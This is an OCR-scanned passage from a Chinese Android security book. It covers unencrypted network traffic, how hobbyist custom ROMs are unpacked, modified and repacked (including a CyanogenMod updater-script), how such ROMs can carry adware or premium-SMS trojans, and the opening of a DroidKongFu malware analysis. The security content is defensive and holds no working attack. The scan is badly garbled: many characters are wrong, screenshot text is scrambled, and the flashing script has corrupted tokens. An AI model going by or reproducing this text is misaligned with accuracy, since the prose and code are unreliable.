同 了 ， 传 递 的 Intent 数 据 可 能 不 希望 被 其 它 程序 截获 ， 但 如 果 在 编写 代 
码 时 采用 上 面 的 方法 来 使 用 Intent， 那 势必 会 造成 潜在 的 安全 隐患 。 

接 下 来 是 软件 与 网 络 服务 器 的 通信 。 这 样 的 情况 在 编写 网 络 软件 程 
序 时 会 经 常 遇 到 : 软件 注册 时 提交 用 户 注 册 信息 、 软 件 登录 验证 、 聊 天 
消息 传递 等 。 同 样 的 ， 这 些 信 息 也 是 用 户 的 隐私 ， 在 进行 数据 传送 时 需 
要 谍 惯 处 理 。 

网 络 数据 通信 可 能 面临 的 攻击 是 网 络 咒 探 ， 如 果 网 络 上 传送 的 数据 
未 经 过 加 密 ， 网 络 咒 探 软 件 截获 到 的 数据 中 ， 就 有 可 能 包含 用 户 的 一 些 
明文 隐私 数据 《例如 网 银 账号 与 密码 ) ， 这 样 产生 的 后 果 是 难以 想象 























的 。 因 为 网 络 数 据 没有 加 密 而 造成 的 用 户 损 失事 件 时 有 发 生 ， 前 段 时 
间 ， 看 雪 安 全 论坛 上 束 有 人 爆 出， 国内 东 聊 天 软件 在 申请 账号 时 ， 提 区 
的 注册 信息 未 经 过 任何 加 密 ， 在 笔者 看 来 ， 这 不 是 编程 人 员 能 力 不 足 ， 
也 不 是 服务 器 条 件 无 法 达到 ， 而 是 由 于 开发 人 员 或 者 公司 本 身 对 安全 的 
不 重视 造成 的 。 

关于 网 络 数据 如 何 加 密 ， 笔 者 在 此 也 没有 太 多 的 建议 ， 网 络 数据 安 
全 不 仅 是 Android 系 统 上 才 有 的 ， 从 第 一 亚 网 络 嗅 探 软件 诞生 的 那天 
起 ， 这 个 问题 就 一直 存 在 。 经 过 多 年 的 经 验 积 累 ， 很 多 公司 都 有 了 一 矢 
成 熟 的 网 络 数据 传送 协议 与 加 密 方 案 ， 笔 者 在 此 提出 这 个 安全 问题 的 目 
的 ， 一 方面 是 给 没有 认识 到 网 络 数据 安全 的 新 手提 个 醒 ， 另 一 方面 是 布 
望 那些 目前 仍然 使 用 明文 传输 数据 、 且 有 能 力 解决 这 个 问题 的 公司 ， 认 
真 做 好 数据 加 密 工 作 ， 不 要 置 用 户 的 隐私 安全 于 不 顾 。 














11.6”ROM 安 全 


什么 是 ROM? ROM 是 英文 Read only Memory 的 首 字母 缩写 ， 意 思 

为 只 读 存 储 器 。 手 机 ROM 指 的 是 存放 手机 固件 代码 的 存储 器 ， 可 以 理 
解 为 手机 的 “系统 ”， 类 似 于 Windows 系 统 安装 光盘 。 所 谓 固 件 是 指 固化 
的 软件 ， 英 文 为 frmware。 通 过 完成 把 某 个 系统 程序 号 入 到 特定 的 硬件 
系统 中 的 FlashROM 这 一 过 程 ， 这 个 系统 程序 就 变 成 了 固件 。 
FlashROM， 即 快速 擦 写 只 读 编程 器 ， 也 束 是 我 们 党 说 的 “闪存 ”"。 爱 的 
歌 Android 手 机 的 人 通常 都 有 一 个 爱好 ， 那 束 是 寻找 ROM 与 刷机 。 本 市 
我 们 来 看 看 ， 网 络 上 这 些 优化 版 、 美 化 版 的 ROM， 都 存在 着 一 些 什么 
样 的 安全 问题 。 


11.6.1 ROM 的 种 类 


根据 ROM 制 作者 不 同 ，Android 系 统 的 ROM 分 为 如 下 三 类 。 

e 官方 ROM 

官方 ROM 是 指 手机 出 广 时 被 刷 入 的 ROM。 通 常人 们 的 理解 是 : 官 
方 的 ， 总 是 最 好 的 。 然 而 实际 上 并 非 如 此 ， 由 于 国情 与 一 些 其 它 的 因 
素 ， 国 内 购买 的 正版 的 Android 手 机 (又 称 国 行 机 〉 远 远 没有 想象 的 那 
么 好 ， 抛 开 手机 质量 与 夸大 其 词 的 配置 不 说 ， 了 就 系统 中 集成 的 软件 就 是 
让 人 难以 接受 的 。 通 常 ， 一 部 国 行 机 入 手 后 ， 里 面 会 塞 满 了 各 种 乱 七 八 
糟 的 软件 ， 这 些 软件 是 软件 开发 商 与 手机 厂商 合作 植 入 的 ， 大 多 数 对 用 
户 没 有 实际 用 途 ， 更 没有 存在 的 价值 ， 然 而 这 些 软 件 都 属于 系统 程序 ， 
用 户 无 法 卸载 ， 用 户 为 了 求 个 清静 ， 只 能 选择 ROOT 手 机 来 删除 它们 ， 
但 问题 也 由 此 出 来 了 ， 手 机 ROOT 后 安全 风险 陡 增 ， 手 机 厂商 拒绝 保修 
等 。 最 终 的 结论 是 : 官方 的 ， 未 必 是 最 好 的 。 





e 第 三 方 ROM 

第 三 方 ROM 是 指 由 第 三 方 ROM 制 作 团队 或 广 商 制作 的 ROM。 目 前 
第 三 方 ROM 制 作 团 队 影 响 力 最 大 的 要 数 国外 的 CyanogenMod 团 队 〔 以 
下 简称 CM 团队 〉， 该 团队 成 立 于 2009 年 ， 专 注 Android 系 统 的 ROM 制 | 
作 ， 该 团队 制作 的 ROOM 无论 质 量 上 、 还 是 数量 上 ， 都 是 其 它 ROM 广 商 
或 团队 无 法 比拟 的 。CM 团 队 出 品 的 ROM 以 数字 命名 ， 目 前 最 新 的 
Android 4.1 命 名 为 CM 10， 读 者 可 以 从 以 下 网 站 获取 CM 的 更 多 信息 : 
http:/www.cyanogenmod.com。 

e 民间 个 人 版 ROM 

民间 个 人 版 ROM 是 指 个 人 在 官方 ROM 或 第 三 方 ROM 的 基础 上 进行 
修改 而 成 的 ROM。 在 国内 ， 有 个 奇怪 的 现象 惑 是 民间 个 人 版 ROM 比 第 
三 方 ROM 更 受 追 摊 ， 人 然而， 往往 也 是 这 些 民间 ROM， 给 用 户 带 来 了 巨 
大 的 经 济 损失 。 





11.6.2 ”ROM 的 定制 过 程 


正如 前 面 介 绍 的 官方 ROM 的 诸多 问题 ， 很 多 人 在 选 购 Android 手 机 
时 ， 不 愿意 购买 国 行 手机 ， 而 是 通过 网 络 或 其 它 渠 道 购买 “日 行 
机 ”“ 港 行 机 >， 然后 自己 寻找 中 意 的 ROM 来 刷机 。 尽 管 官方 的 ROM 最 
稳定 ， 同 时 也 是 最 安全 的 ， 但 用 户 通常 在 有 多 个 选择 时 不 会 去 考虑 它 。 

ROM 的 制作 可 以 是 基于 Android 源 码 的 修改 ， 也 可 以 是 基于 官方 
ROM 的 改造 。 直 接 编译 的 Android 源 码 通常 在 用 户 的 手机 上 是 无 法 运行 
的 ， 因 为 缺少 与 手机 硬件 相关 的 驱动 程序 ， 然 而 驱动 程序 是 手机 厂商 的 
商业 机 密 ， 通 常 是 不 会 开源 的 ， 因 此 ， 实 际 的 ROM 制 作 多 是 基于 
Android 的 源码 与 手机 官方 ROM 中 提供 的 驱动 程序 来 制作 的 ，CM 团 队 整 
是 这 乏 干 的; 

随 着 Android 系 统 的 普及 ， 使 用 Android 手 机 的 用 户 越 来 越 多 ， 用 户 




















对 ROM 的 需求 也 越 来 越 明显 。 俗 话说 ， 有 需求 束 会 有 市 场 ， 国 内 外 很 
多 公司 看 准 了 这 个 商机 ， 纷 纷 投入 到 ROM 的 制作 中 来 。 以 国内 市 场 来 
说 ， 最 大 的 问题 是 技术 水 平 ， 修 改 Android 系 统 源码 不 是 一 个 普通 技术 
员 能 够 办 到 的 事情 ， 这 涉及 到 很 多 系统 底层 的 知识 ， 以 及 对 Android 系 
统 架 构 的 了 解 。 再 者 ， 市 场 上 的 Android 手 机 品牌 与 型 号 林林总总 ， 
一 球 手 机 都 有 自己 的 特点 ， 使 用 不 同 的 硬件 配置 ， 即 使 是 同一 厂家 生产 
的 同一 系列 的 手机 ， 也 无 法 保证 其 ROM 的 兼容 性 ， 这 就 是 Android 系 统 
的 一 个 大 问题 : 碎片 化 。 

雁 片 化 问题 加 大 了 软件 开 及 人员 与 ROM 制 作者 的 开发 成 本 ， 制 约 
了 Android 系 统 的 有 发展 ， 机 型 的 适 配 可 能 会 让 ROM 制 作 团队 面临 着 一 个 
窖 态 : 那 就 是 每 制作 一 天 相应 手机 的 ROM 时 ， 就 不 得 不 购置 一 合 该 型 
号 的 手机 ， 最 后 的 场景 是 制作 ROM 的 团队 看 上 去 更 像 是 卖 手 机 的 。 妆 
然 ， 笔 者 在 此 只 是 戏说 ， 对 于 大 型 团队 来 说 ， 这 点 制作 成 本 还 是 能 够 接 
受 的 ， 不 过 对 于 个 人 ROM 制 作者 来 说 ， 残 是 一 笔 不 小 的 开支 了。 

为 了 尽 可 能 的 将 成 本 降 到 最 低 ， 国 内 的 ROM 制 作 广 商 与 个 人 都 选 
择 了 在 第 三 方 ROM 的 基础 上 进行 改造 。 这 样 做 的 好 处 是 : 减少 了 制作 
与 测试 的 成 本 。 一 丈 稳 定 的 ROM， 从 制作 到 测试 都 是 需要 花费 大 量 的 
时 间 与 精力 的 ， 如 果 一 切 从 头 开始 ， 势 必 会 给 ROM 制 作 团队 带 来 巨大 
的 开支 ， 对 于 市 场 经 济 下 急功近利 的 厂商、 抄 认 成 性 的 开 市 场 来 说 ， 日 
手 起 家 无 疑 是 一 种 “ 患 蕊 ”的 行为 。 众 说 周知 ，CM 团 队 的 ROM 在 发 布 前 
都 经 过 了 严格 的 测试 ， 其 稳定 性 是 寺 庸 置疑 的 ， 而 且 CM 团 队 的 ROM 是 
开源 的 ， 因 此 ， 国 内 很 多 ROMJ 商都 将 CM 团 队 的 ROM 作 为 基础 ， 进 行 
二 次 开发 。 

民间 个 人 版 的 ROM 在 多 数 情 况 下 ， 不 会 对 ROM 进 行 大 幅度 的 修 
改 ， 它 们 只 是 在 已 有 ROM 的 基础 上 进行 微调 。 民 间 个 人 版 的 ROM 在 国 
内 拥有 着 不 可 小 磺 的 市 场 ， 在 各 大 知名 的 Android 手 机 论坛 上 ， 充 斥 帮 
各 种 优化 版 、 美 化 版 的 ROM， 下 面 我 们 来 看 看 这 些 民 间 个 人 版 ROM 是 


























如 何 被 生产 出 来 的 。 通 党 民间 个 人 版 的 ROM 的 制作 会 进行 如 下 几 道 工 
序 : 

1. ROM 解 包 

2. ROM 修 改 

3. ROM 打 包 

下 面 我 们 来 分 别 看 看 这 每 一 道 工序 都 做 了 什么 。 

。 ROM 解 包 

个 人 用 户 大 多 数 不 具 备 专业 的 Android 软 件 开发 知识 ， 他 们 的 工作 
都 是 基于 官方 ROM 或 第 三 方 ROM 的 修改 ， 而 修改 ROM 的 第 一 步 就 是 对 
己 有 的 ROM 进 行 解 包 。 

根据 手机 刷机 方式 的 不 同 ， 可 以 分 为 线 刷 与 卡 刷 两 种 。 线 刷 是 指使 
用 USB 数 据 线 连接 电脑 ， 通 过 电脑 上 的 刷机 软件 进行 刷机 ， 而 卡 刷 则 是 
把 ROM 或 者 升级 包 找 贝 到 手机 SD 卡 中 进行 刷机 操作 。 线 刷 一 般 是 官方 
所 采取 的 刷机 方式 ， 如 果 出 现 手机 故障 造成 无 法 开机 等 情况 ， 我 们 可 以 
考虑 使 用 线 刷 来 拯救 手机 。 

线 刷 一 般 需 要 使 用 单独 的 刷机 工具 ， 而 且 线 刷 使 用 的 ROM (以 下 
简称 为 线 刷 包 ) 与 卡 刷 的 zip 压 缩 包 有 所 不 同 。 比 如 ，Motorola 生 产 的 
Android 手 机 ， 线 刷 包 都 是 sdf 文 件 格式 ， 要 想 解 包 这 类 ROM， 需 要 使 用 
专门 针对 它 的 解 包 工具 如 MotoAndroidDepacker 对 其 进行 解 包 。 图 11-19 
为 笔者 使 用 MotoAndroidDepacker 打 开 Moto XT615 一 个 sbf 刷 机 包 后 的 截 
图 。 
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Dpen Files odeero i End Address Descript Checksum Code 
Split To Fold A 2D700000 | ZD7404FF | oaoo DoEa 5Coo 0000 0038 0403 0000 0000 555B | Dooo 


v0000000 | 142ESF9OF | oooo Dooo 0000 0000 0138 0406 0000 0000 9194 | L008 


Dpen From File | |HELP |ISBF | 
0 er 
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图 11-19 使 用 MotoAndroidDepacker 解 包 sbf 文 件 


点 击 界面 上 的 “Split To Folder” 按 钮 ，sbf 文 件 中 所 有 的 内 容 束 会 解 
包 成 多 个 单独 的 smg 文 件 ， 此 处 生成 的 CG2.smg 需 要 使 用 
MotoAndroidDepacker 再 解压 一 次 ， 才 能 得 到 最 终 的 mbn 文 件 ， 它 们 实质 
上 都 是 yaffs 格 式 的 系统 镜像 文件 ， 下 一 步 就 是 使 用 unyaffs 解 压 这 些 镜像 
文件 ， 以 便 下 一 步 进 行 ROM 的 修改 。unyaffs 是 一 个 开源 的 工具 ， 项 目 
地 址 为 http://code.google.com/p/unyaffs。 

还 有 一 种 线 刷 包 ， 它 的 提供 方式 与 Android ”AVD 的 镜像 类 似 。 例 
如 ， 三 星 i9300 的 最 新 欧 版 线 刷 包 中 有 两 个 文件 Odin3_v3.04.zip 与 


I9300XXDLH4 I93000XADLH4 I9300XXLH1 BTU.tar.md5， 前 者 是 线 
刷 包 软件 ， 后 者 是 线 刷 包 ， 笔 者 使 用 WinRAR 打 开 线 刷 包 后 如 图 11-20 所 
示 ， 一 共 包 含 5 个 img 文 件 。 


泛 I9300XXDLH4_I93000XADLH4_I9300XXLHI_BTU-tar-ad5 一 WinRAR 
文件 到 ) 命令 CC) 工具 人 @) 收藏 来 Q@) 选项 GO 帮助 0 


和 直 和 机 验 里 明 


解压 到 扫 措 病 素 


国 :| 国 Ts3o0xxpDts_Ts3000XADDH4_I9300XXDtL_BTV tor. ma5 - TAR 压缩 文件 ， 解 包 大 小 为 1,238, 390,740 字 节 。 六 


名 称 售 大 小 压缩 后 大 小 ”类 型 修改 时 间 CRC32 
te 
加 boot.ims 8,386,606 8,388,608 ING 文件 | 2012-8-17 1, SAA 
| 加 noden bin 12, 583, 168 12, 583, 168 BIN 文件 2012-8-4 11;49 
团 recovery. 1me 5, 652, 736 5, 652, 736 JWG 文件 2012-7-26 1, 

加 system, 1mg logit OG F210 ING 文件 1206-1T7 2.. 


回 tz ing 159, T44 159, 744 ING 文件 2011-6-23 1;25 


总 计 1 236, 390, 740 字 节 三 个 文件 ) 





图 11-20 i9300 线 刷 包 


接 下 来 的 工作 就 是 将 这 些 img 文 件 使 用 unyaffs 解 压 出 来 ， 以 便 下 一 
步 进行 ROM 的 修改 。 

比 起 线 刷 ， 卡 刷 方式 更 简便 ， 而 且 卡 刷 使 用 的 ROM (以 下 简称 为 
卡 刷 包 ) 只 是 一 个 普通 的 zip 压 缩 包 ， 里 面 的 任何 文件 都 可 以 单独 提取 
出 来 修改 。 以 i9100 最 新 的 CM10 为 例 ， 使 用 WinRAR 打 开 卡 刷 包 后 如 图 
11-21 所 示 ， 线 刷 包 包含 一 个 boot.img 文 件 与 两 个 目录 ，META-INF 目 录 
下 存放 的 是 线 刷 包 的 签名 与 刷机 脚本 ，system 目 录 存 放 的 是 需要 刷 入 手 
机 的 文件 ， 对 于 完整 的 刷机 包 ， 它 里 面 直接 对 应 手机 刷机 后 的 system 目 
录 内 容 ， 对 于 更 新 包 或 服务 包 ， 它 里 面 存 放 的 只 是 需要 更 新 的 系统 文 
件 。 





江 ca-10-20121014-RIGHILTY-i9100. zip 一 WimRAR 
文件 到 ) 命令 {C) 工具 G) 收藏 夹 @) 选项 外 帮助 0) 


寺 国 轩 时 世 山 验 轴 印 才 


添加 


查找 扫描 病毒 Ef 自 和 解压 格式 


国 10-20121014-HNIGHTLY-i9100. zip ~ ZIP 上 压缩 文件 ， 解 包 大 小 为 247, 634, 117 字 节 





名 称 个 


| 

[是 TA-INF 
ID system 
加 boot. ime 








大 小 压缩 后 大 小 ”类 型 siened by Sienkpk 
文件 来 
文件 夹 
立 件 来 
4, 536, 376 4,535,018 IMG 文件 


总 计 2 文件 夹 和 拟 536, 376 字 节 (1 个 文件 ) 


图 11-21 i9100 的 CM10 线 刷 包 


ROM 修 改 


根据 修改 ROM 的 作用 与 难度 不 同 ， 其 修改 的 内 容 也 不 一 样 。 首 先 
是 线 刷 包 的 修改 ， 很 多 手机 广 商 的 线 刷 包 都 是 目 定义 的 文件 格式 ， 经 过 
相应 的 解 包工 具 提 取出 线 刷 包 中 的 内 容 后 ， 就 可 以 对 其 进行 修改 了 ， 例 
如 ， 优 化 版 的 ROM 通 常 要 做 的 事情 包含 : 


1. 


OO UU 人 NN 


ROM 和 集成 驱动 更 新 
内 核 优化 


. 组件 精 减 

.系统 bug 修 正 
.加 入 root 权 限 
.系统 功能 增强 


ee 要 做 的 事件 包含 : 
.系统 框架 资源 修改 


2. 组 件 精 减 

3. 开关 机 动画 修改 
4. 铃声 修改 

5 


.系统 功能 增强 (可 无 ) 

优化 版 的 ROM 修 改 起 来 的 难度 稍微 高 一 些 ， 操 作 时 可 能 涉及 到 修 
改 或 蔡 换 系统 底层 文件 ， 例 如 : 手机 基 珊 、Wi-Fi 驱 动 、 摄 像 头 驱动 
等 ， 还 有 可 能 涉及 到 系统 配置 文件 ， 例 如 : init.rc、/system/build.prop 
等 ， 像 CM 这 类 专业 的 ROM 还 会 加 入 很 多 增强 的 功能 ， 例 如 : DSP 音 效 
增强 、 系 统 主题 增强 、 隐 私 保护 增强 等 。 

美化 版 的 ROM 修 改 起 来 相对 简单 ， 通 党 情况 下 ， 主 要 的 工作 是 修 
改 framework-res.apk 里 面 的 资源 文件 ， 例 如 : 修改 系统 所 有 的 UI 图 标 、 
更 面 背景 、 界 面 文字 等 。 当 然 ， 也 可 以 加 入 优化 版 ROM 中 相应 的 功 
能 。 

比 起 线 刷 包 ， 卡 刷 包 的 优化 与 美化 是 最 简单 的 。 因 为 卡 刷 包 里 面 的 
任何 一 个 文件 都 可 以 单独 提取 出 来 进行 修改 ， 而 且 针 对 CM 卡 刷 包 的 加 
工 ， 可 以 直接 对 其 进行 源码 级 修改 。 卡 刷 包 的 修改 比 线 刷 包 的 修改 多 一 
个 步 台 ， 那 就 是 编写 刷机 脚本 。 刷 机 脚本 只 是 一 个 文本 文件 ， 通 党 该 文 
件 命 名 为 updater-script， 位 于 卡 刷 包 的 META-INF\com\google\android 目 
录 。 以 三 星 i9100 的 CM10 卡 刷 包 为 例 ， 它 的 updater-script 文 件 内 容 如 
下 











assert (getprop("ro.product .device") == "galaxys2" ||getprop("ro.build.product") 


== "galaxyeg* || 
getprop("ro.product.device") == "i9100" || getprop("ro.build.product") 
== "i9100" || 
getprop("ro.product.device") == "GT-I9100" || getprop("ro.build.product") 
== "GT=I9100" | | 
getprop("ro.product.device") == "GT-I9100M" | | getprop("zo.build.product") 
== "GT-I9100M" | | 
getprop("ro.product.device") == "GT-I9100P" | | getprop("ro.build.product") 
== "GT-I9100P" || 
getprop("ro.product .device") == "GT-I9100T" | | getprop("ro.build.product") 
== OT=I9100T"); 

mount ("ext4", "EMMC", "/dev/block/mmcblk0p9", "/system"); 

package_ extract_file("system/bin/backuptool.sh", "/tmp/backuptool .sh"); 


package_extract_file("system/bin/backuptool .functions", 

"jtmp/backuptool .functions"); 

set_perm(0, 0, 0777, "/tmp/backuptool.sh"); 

set_perm(0, 0, 0644, "/tmp/backuptool.functions"); 

run_program("/tmp/backuptool.sh", "backup"); 

unmount ("/system"); 

show_progress(0.500000, 0)， 

unmount ("/system"); 

format ("ext4", "EMMC", "/dev/block/mmcblk0p9", "0", "/system"); 

mount ("ext4", "EMMC", "/dev/block/mmcblk0p9", "/system"); 

package_extract_dir("recovery", "/system"); 

package_extract_dir("system", "/system"); 

symlink("Roboto-Bold.ttf", "/system/fonts/DroidSans-Bold.ttf"); 

symlink("Roboto-Regular.ttf", "/system/fonts/DroidSsans.ttf"); 

symlink("busybox", "/system/xbin/[", "/system/xbin/[[", 
"/system/xbin/adjtimex", "/system/xbin/arp", "/system/xbin/ash", 


"/system/xbin/awk", "/system/xbin/baseé64", "/system/xbin/basename", 
"/system/xbin/xz", "/system/xbin/xzcat", "/system/xbin/yes'", 
"/system/xbin/zcat"); 

symlink("mksh", "/system/bin/sh"); 

symlink ("toolbox", "/system/bin/cat", "/system/bin/chmod", 
"/system/bin/chown", "/system/bin/cmp", "/system/bin/date", 
"/system/bin/uptime", "/system/bin/vmstat", "/system/bin/watchprops", 
"/system/bin/wipe"); 

set_perm recursive(0, 0, 0755, 0644, "/system"); 

set_perm recursive(0, 0, 0755, 0755, "/system/addon.d"); 

set_perm(0, 0, 06755, "/system/xbin/procrank"); 

set_perm(0, 0, 06755, "/system/xbin/su"); 

show_progress(0.200000, 0); 

show_progress(0.200000, 10); 

package extract file("system/bin/backuptool.sh", "/tmp/backuptool.sh"); 

package_ extract_ file("system/bin/backuptool .functions", 

"/tmp/backuptool .functions"); 

set_perm(0, 0, 0777, "/tmp/backuptool .sh"); 

set_perm(0, 0, 0644, "/tmp/backuptool .functions"); 

run_program("/tmp/backuptool.sh", "restore"); 

delete("/system/bin/backuptool .sh"); 

delete("/system/bin/backuptool.functions"); 

show_progress(0.200000, 10); 

assert (package extract_file("boot.img", "/tmp/boot.img"), 

write_raw_image("/tmp/boot.img", "/dev/block/mmcblk0p5"), 
delete("/tmp/boot.img")); 
show_progress(0.100000, 0); 
unmount ("/system"),; 


该 刷机 脚本 的 工作 包含: 

assert(): 检查 手机 的 版 本 

mount(): 加 载 系统 
package_extract_file() 释 放 备 份 工 具 脚 本 
set_perm(): 赋予 备份 工具 脚本 执行 权限 
run_program(): 执行 备份 操作 
unmount(): 锚 载 系统 


show_progress(): 显示 进度 条 

format(): 格式 化 系统 分 区 

mount(): 加 载 系统 

package_extract_dir(): 释放 刷机 包 

symlink(): 创建 软 链接 

set_perm_recursive() 与 set_perm (): 设置 文件 与 目录 权限 
package_extract_file() 与 run_program(): 还 原 备份 





write_raw_image(): 写 boot 分 区 

unmount(): 氏 载 系统 

从 上 面 的 命令 序列 可 以 看 出 ， 整 个 卡 刷 的 过 程 就 是 一 个 执行 格式 化 
系统 、 找 贝 文件 、 设 置 权 限 的 过 程 。 

。 ROM 打 包 

当 ROM 修 改 完 成 ， 最 后 一 步 就 是 打包 修改 后 的 文件 为 刷机 包 了 。 
首先 是 卡 刷 包 ， 通 常 是 使 用 专门 针对 厂商 ROM 的 工具 进行 打包 ， 在 打 
包 前 ， 需 要 先 将 修改 的 文件 做 成 yaffs 镜 像 ， 可 以 使 用 mkyaffs2image 工 
上 共 来 完成 ， 该 工具 位 于 Android 系 统 源码 中 ， 成 功 编译 系统 源码 后 可 以 
在 /media/source/android4.0/out/host/linux-x86/bin 目 录 下 找到 它 的 可 执行 
文件 ， 在 终端 提示 符 下 执行 以 下 命令 即 可 打包 当前 system 目 录 下 所 有 的 
文件 为 system.img。 

./mkyaffs2image system system.img 

线 刷 包 的 打包 更 简单 ， 可 以 直接 通过 解压 缩 软件 导入 导出 线 刷 包 里 
面 的 文件 。 

最 后 就 是 签名 了 ， 线 刷 包 使 用 专门 针对 厂商 ROM 的 工具 进行 签 
名 ， 而 卡 刷 包 的 签名 方法 与 apk 文 件 签名 方法 一 样 ， 使 用 signapk.jar 就 可 


























11.6.3 ”定制 ROM 的 安全 隐患 


ROM 的 安全 问题 一 直 没 有 受到 重视 ， 直 到 2011 年 底 ，CIQ 病 毒 事件 
的 及 生 ， 才 使 得 ROM 的 安全 问题 首次 通过 媒体 报道 出 来 ， 是 因为 市 场 
上 没有 CIQ 这 类 的 病毒 吗 ? 很 显示 不 是 。 笔 者 认为 极 大 可 能 的 原因 是 产 
业 利益 在 作 早 ， 都 不 愿意 公开 这 不 为 人 知 的 内 幕 。 关 于 CIQ 的 详细 介绍 
与 分 机 ， 笔 者 在 此 就 不 展开 了 ， 有 兴趣 的 读者 可 以 访问 安 天 实验 室 的 网 
站 来 查看 其 分 析 报 告 。 网 址 是 : 
http:/www.antiy.com/cn/security/2011/analysis_of carrieriq.htm 。 

现 如 今 ， 网 上 流传 的 民间 个 人 版 ROM 已 经 和 当初 仅 作为 技术 交流 
的 性 质 发 生 了 根本 的 不 同 。 如 图 11-22 所 示 ， 民 间 个 人 版 ROM 已 经 成 为 
了 广告 软件 与 非法 SP (Service Provider) 生存 的 又 一 个 寄宿 点 ， 广 告 软 
件 与 非法 SP 直接 与 ROM 制 作者 勾结 ， 在 ROM 中 植 入 广告 软件 或 暗 扣 软 
件 ， 这 样 当 用 户 下 载 并 刷 入 该 ROM 后 ， 就 会 面临 手机 话费 莫 明 奇妙 减 
少 、 广 告 软件 越 来 越 多 的 危险 。 








~ 全 howif 者 
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Sp 





图 11-22 ”民间 个 人 版 ROM 的 黑色 产业 链 


在 上 一 小 节 中 ， 我 们 看 到 了 民间 个 人 版 ROM 的 制作 过 程 ， 从 这 个 
过 程 中 可 以 看 出 ， 修 改 者 完全 可 以 神 不 知 、 鬼 不 觉 地 向 ROM 中 添加 任 
何 自己 要 想 加 入 的 “功能 ”。 随 着 ROM 制 作 技术 的 越 来 越 完善 ，ROM 中 
植 入 广告 与 木马 的 手段 也 越 来 越 高 明了 。 初 级 的 作法 是 将 广告 软件 植 入 
系统 后 ， 使 用 论坛 活动 或 其 它 方式 诱骗 用 户 下 载 安装 ， 而 高 级 的 作法 就 
不 是 这 么 简单 了 ， 它 们 会 更 改 系 统 源码 、 修 改 系 统 组 件 、 添 加 恶意 
件 ， 例 如 修改 电话 与 短信 模块 的 源码 ， 直 接 在 系统 底层 处 理 SP 暗 扣 短 
信 。 面 对 这 种 修改 过 的 ROM， 一 般 用 户 基本 上 是 无 法 察觉 出 ROM 的 问 
题 的， 即使 是 专业 的 技术 人 员 也 不 可 能 短 时 间 内 找 出 问题 所 在 。 现 在 唯 
一 要 做 的 就 是 按 下 键盘 上 的 SHIFT+DEL， 将 其 清理 出 电脑 。 














11.6.4 如 何 防 苞 


关于 防范 ， 笔 者 提出 以 下 几 点 意见 ; 

1. 使 用 官方 ROM 

官方 的 ROM 尽 管 存在 着 各 种 问题 ， 但 安全 性 是 最 有 保障 的 。 笔 者 
建议 用 户 可 以 购买 Android 系 统 源码 支持 比较 好 的 手机 ， 例 如 Google 公 
司 自 己 出 品 的 手机 ， 需 要 刷机 时 只 需要 自己 动手 编译 Android 源 码 即 
ss 

2. 使 用 权威 团队 制作 的 ROM 

权威 团队 无 论 是 质量 上 ， 还 是 安全 性 上 都 是 比较 有 保障 的 ， 读 者 可 
以 酌情 的 选择 国内 外 优秀 的 ROM 作 为 自己 爱 机 的 系统 。 而 对 于 那些 民 
间 个 人 版 的 ROM， 最 好 是 不 要 使 用 ， 以 免 造 成 不 必要 的 经 济 损失 。 

3. 自动 动手 ， 丰 衣 足 食 

从 11.6.2 小 市 的 内 容 中 来 看 ， 动 手 制作 一 个 属于 自己 的 ROM 并 不 是 
太 难 (并 非 绝 对 ， 与 手机 型 号 本 身 也 有 一 点 关系 ) ， 如 果 自 己 的 手机 有 
幸 在 CM 团队 的 文 持 之 列 ， 可 以 选择 在 CM 团队 制作 的 ROM 基 础 上 进行 
修改 ， 反 之 ， 只 能 自己 动手 制作 了 。 














11.7 本 章 小 结 





本 章 主要 从 不 同 的 角度 介绍 了 Android 系 统 中 存在 的 安全 问题 。 希 
望 读 者 在 阅读 完 本 章 后 ， 对 Android 系 统 的 安全 有 一 个 全 新 的 认识 。 





第 12 章 ”DroidKongFu 变 种 病毒 实 
例 分 析 


2012 是 Android 系 统 快速 发 展 的 一 年 ， 同 样 也 是 Android 手 机 病毒 独 
狐 的 一 年 ! 

Android 系 统 由 于 其 开放 性 ， 得 到 了 广大 用 户 与 开发 人 员 的 青睐 ， 
与 此 同时 ， 也 来 了 很 多 软件 安全 方面 的 问题 。 用 户 可 以 在 网 上 随意 下 载 
喜欢 的 Android 软 件 与 游戏 ， 然 而 非法 Android 市 场 上 的 特殊 版 软件 、 手 
机 论坛 中 的 破解 版 游戏 ， 都 是 手机 病毒 传播 的 主要 场所 。 普 通用 户 很 难 
辨别 下 载 的 软件 是 否 为 恶意 的 病毒 程序 ， 一 旦 用 户 手机 不 小 心安 装 了 它 
们 ， 就 会 面临 着 个 人 隐私 被 泄漏 、 手 机 系统 遭 破 坏 、 话 费 无 故 “ 失 踊 ” 等 
危险 。 

在 本 章 中 ， 笔 者 将 通过 分 析 一 个 完整 的 Android 手 机 病毒 样本 ， 展 
示 它 不 为 人 知 的 “技术 ”， 让 读者 从 根本 上 了 解 手 机 病毒 的 所 作 所 为 ， 更 
深层 次 地 理解 Android 系 统 安全 ， 做 到 防 患 于 未 然 。 

















12.1 DroidKongFu 病 毒 介 绍 


DroidKongFu 是 Android 平 台 上 一 蒜 十 分 活跃 的 病毒 。 早 在 2011 年 ， 
这 款 病 毒 就 出 现 了 ， 这 款 病毒 曾经 被 一 次 次 被 上 曝光， 但 病毒 的 作者 非但 
没有 停止 开发 ， 反 而 变本加厉 ， 一 次 次 升级 病毒 程序 ， 和 破坏 性 也 由 原先 
的 下 载 恶 意 广 告 软件 到 现在 的 自 改 手机 系统 ， 其 性 质 恶 劣 可 见 一 斑 。 

DroidKongFu 病 毒 的 主体 是 一 个 Android 原 生 程序 ， 通 常 它 被 捆绑 到 
正常 的 Android 软 件 中 ， 用 户 只 要 安装 遭 到 捆绑 的 软件 就 会 感染 该 病 
毒 。 本 章 分 析 的 病毒 样本 为 DroidKongFu 病 毒 的 最 新 升级 版 ， 该 病毒 捆 
绑 在 一 款 名 为 “Cut The Rope Unlock” 的 游戏 解锁 软件 中 ， 软 件 信息 如 图 
12-1 所 示 〈 图 中 的 APK 安 装 器 是 笔者 使 用 C++ 语 言 编写 的 一 款 安 装 
Android 软 件 的 小 程序 ， 本 书 配套 源 代码 中 提供 了 该 工具 的 可 执行 文件 
及 源码 ) 。 


1 


软件 名 称 : Cut The Rope Unlock 
软件 包 名 : com,tebs3.cuttherope 
软件 版 本 : i 
¥ 系统 要 求 : 。 Android 1.6 
文件 大 小 : 88.2KB 


选择 APK 文 件 安装 路 径 : ”| 手机 
软件 权限 : 查看 


软件 已 就 绪 ， 点击" 安装 "按钮 进行 安装 ,,， 


口 ] 安装 前 先 部 载 旧版 本 关联 本 程序 

















